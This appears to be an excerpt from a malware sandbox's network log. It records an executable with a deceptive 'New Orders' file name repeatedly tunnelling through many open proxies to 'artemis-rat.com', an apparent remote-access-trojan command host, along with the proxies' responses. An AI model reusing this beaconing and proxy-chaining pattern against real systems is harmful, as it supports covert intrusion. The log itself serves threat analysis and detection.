                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        540192.168.2.951424212.108.145.19590907672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.033938885 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        541192.168.2.9514648.219.97.248807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.041219950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.379590988 CET718INHTTP/1.1 502 Bad Gateway
                                                                                        Server: Tengine
                                                                                        Date: Mon, 11 Mar 2024 15:16:42 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 571
                                                                                        Connection: close
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 20 53 6f 72 72 79 20 66 6f 72 20 74 68 65 20 69 6e 63 6f 6e 76 65 6e 69 65 6e 63 65 2e 3c 62 72 2f 3e 0d 0a 50 6c 65 61 73 65 20 72 65 70 6f 72 74 20 74 68 69 73 20 6d 65 73 73 61 67 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 74 6f 20 75 73 2e 3c 62 72 2f 3e 0d 0a 54 68 61 6e 6b 20 79 6f 75 20 76 65 72 79 20 6d 75 63 68 21 3c 2f 70 3e 0d 0a 3c 74 61 62 6c 65 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 55 52 4c 3a 3c 2f 74 64 3e 0d 0a 3c 74 64 3e 68 74 74 70 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 3c 2f 74 64 3e 0d 0a 3c 2f 74 72 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 53 65 72 76 65 72 3a 3c 2f 74 64 3e 0d 0a 3c 74 64 3e 69 7a 74 34 6e 66 33 77 73 39 30 37 62 63 79 6e 6a 71 6e 77 77 39 7a 3c 2f 74 64 3e 0d 0a 3c 2f 74 72 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 44 61 74 65 3a 3c 2f 74 64 3e 0d 0a 3c 74 64 3e 32 30 32 34 2f 30 33 2f 31 31 20 32 33 3a 31 36 3a 34 32 3c 2f 74 64 3e 0d 0a 3c 2f 74 72 3e 0d 0a 3c 2f 74 61 62 6c 65 3e 0d 0a 3c 68 72 2f 3e 50 6f 77 65 72 65 64 20 62 79 20 54 65 6e 67 69 6e 65 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 74 65 6e 67 69 6e 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center> Sorry for the inconvenience.<br/>Please report this message and include the following information to us.<br/>Thank you very much!</p><table><tr><td>URL:</td><td>http://artemis-rat.com</td></tr><tr><td>Server:</td><td>izt4nf3ws907bcynjqnww9z</td></tr><tr><td>Date:</td><td>2024/03/11 23:16:42</td></tr></table><hr/>Powered by Tengine<hr><center>tengine</center></body></html>
                                                                                        Mar 11, 2024 16:16:42.586255074 CET718INHTTP/1.1 502 Bad Gateway
                                                                                        Server: Tengine
                                                                                        Date: Mon, 11 Mar 2024 15:16:42 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 571
                                                                                        Connection: close
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 20 53 6f 72 72 79 20 66 6f 72 20 74 68 65 20 69 6e 63 6f 6e 76 65 6e 69 65 6e 63 65 2e 3c 62 72 2f 3e 0d 0a 50 6c 65 61 73 65 20 72 65 70 6f 72 74 20 74 68 69 73 20 6d 65 73 73 61 67 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 74 6f 20 75 73 2e 3c 62 72 2f 3e 0d 0a 54 68 61 6e 6b 20 79 6f 75 20 76 65 72 79 20 6d 75 63 68 21 3c 2f 70 3e 0d 0a 3c 74 61 62 6c 65 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 55 52 4c 3a 3c 2f 74 64 3e 0d 0a 3c 74 64 3e 68 74 74 70 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 3c 2f 74 64 3e 0d 0a 3c 2f 74 72 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 53 65 72 76 65 72 3a 3c 2f 74 64 3e 0d 0a 3c 74 64 3e 69 7a 74 34 6e 66 33 77 73 39 30 37 62 63 79 6e 6a 71 6e 77 77 39 7a 3c 2f 74 64 3e 0d 0a 3c 2f 74 72 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 44 61 74 65 3a 3c 2f 74 64 3e 0d 0a 3c 74 64 3e 32 30 32 34 2f 30 33 2f 31 31 20 32 33 3a 31 36 3a 34 32 3c 2f 74 64 3e 0d 0a 3c 2f 74 72 3e 0d 0a 3c 2f 74 61 62 6c 65 3e 0d 0a 3c 68 72 2f 3e 50 6f 77 65 72 65 64 20 62 79 20 54 65 6e 67 69 6e 65 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 74 65 6e 67 69 6e 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center> Sorry for the inconvenience.<br/>Please report this message and include the following information to us.<br/>Thank you very much!</p><table><tr><td>URL:</td><td>http://artemis-rat.com</td></tr><tr><td>Server:</td><td>izt4nf3ws907bcynjqnww9z</td></tr><tr><td>Date:</td><td>2024/03/11 23:16:42</td></tr></table><hr/>Powered by Tengine<hr><center>tengine</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        542192.168.2.951598203.32.120.202807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.042124033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.196430922 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:42 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        543192.168.2.95138713.234.24.11610807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.044827938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.449767113 CET116INHTTP/1.1 200 OK
                                                                                        Date: Mon, 11 Mar 2024 15:16:42 GMT
                                                                                        Server: nginx
                                                                                        Content-Type: text/plain
                                                                                        Content-Length: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        544192.168.2.9514628.222.152.158555557672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.048718929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.398411036 CET39INHTTP/1.1 200 Connection established
                                                                                        Mar 11, 2024 16:16:43.324048042 CET39INHTTP/1.1 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        545192.168.2.95156572.10.164.17814037672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.051129103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.938050032 CET19INHTTP/1.0 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        546192.168.2.951614104.24.236.203807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.052566051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.206691980 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:42 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        547192.168.2.951858152.32.132.2204437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.059138060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        548192.168.2.951862152.32.132.2204437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.059890985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        549192.168.2.951864152.32.132.2204437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.060789108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        550192.168.2.951635104.16.106.154807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.060888052 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.214967966 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:42 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        551192.168.2.951866152.32.132.2204437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.062062025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        552192.168.2.95150224.249.199.1241457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.066919088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        553192.168.2.95150091.136.142.15380807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.072551966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.292342901 CET19INHTTP/1.1 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        554192.168.2.951579171.22.108.18831287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.100724936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.632435083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:57.129295111 CET39INHTTP/1.1 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        555192.168.2.951649104.18.103.125807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.100933075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.255887985 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:42 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        556192.168.2.951507121.128.194.154807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.100933075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        557192.168.2.95154772.195.34.60273917672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.103689909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        558192.168.2.950838125.26.183.7980807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.103817940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.166146994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.607115030 CET202INHTTP/1.0 404 Not Found
                                                                                        Content-Length: 717
                                                                                        Content-Type: text/html
                                                                                        Date: Mon, 11 Mar 2024 15:16:46 GMT
                                                                                        Expires: Mon, 11 Mar 2024 15:16:46 GMT
                                                                                        Server: Mikrotik HttpProxy
                                                                                        Proxy-Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        559192.168.2.95148565.1.40.4710807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.103908062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.494580030 CET116INHTTP/1.1 200 OK
                                                                                        Date: Mon, 11 Mar 2024 15:16:42 GMT
                                                                                        Server: nginx
                                                                                        Content-Type: text/plain
                                                                                        Content-Length: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        560192.168.2.951681172.64.86.217807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.104320049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.259876966 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:42 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        561192.168.2.951692104.19.85.214807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.107496977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.262751102 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:42 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
